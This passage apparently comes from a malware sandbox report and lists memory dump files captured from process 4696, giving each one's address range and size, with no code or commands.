                                                                                                                      • memory/4696-66-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-60-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-28-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-24-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-12-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-4-0x0000000006BA0000-0x0000000006C32000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/4696-3-0x00000000070B0000-0x0000000007654000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        5.6MB

                                                                                                                      • memory/4696-5054-0x0000000006F40000-0x0000000006F94000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        336KB

                                                                                                                      • memory/4696-5147-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4696-2-0x00000000068C0000-0x0000000006B00000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-1-0x0000000000960000-0x0000000000DE6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4.5MB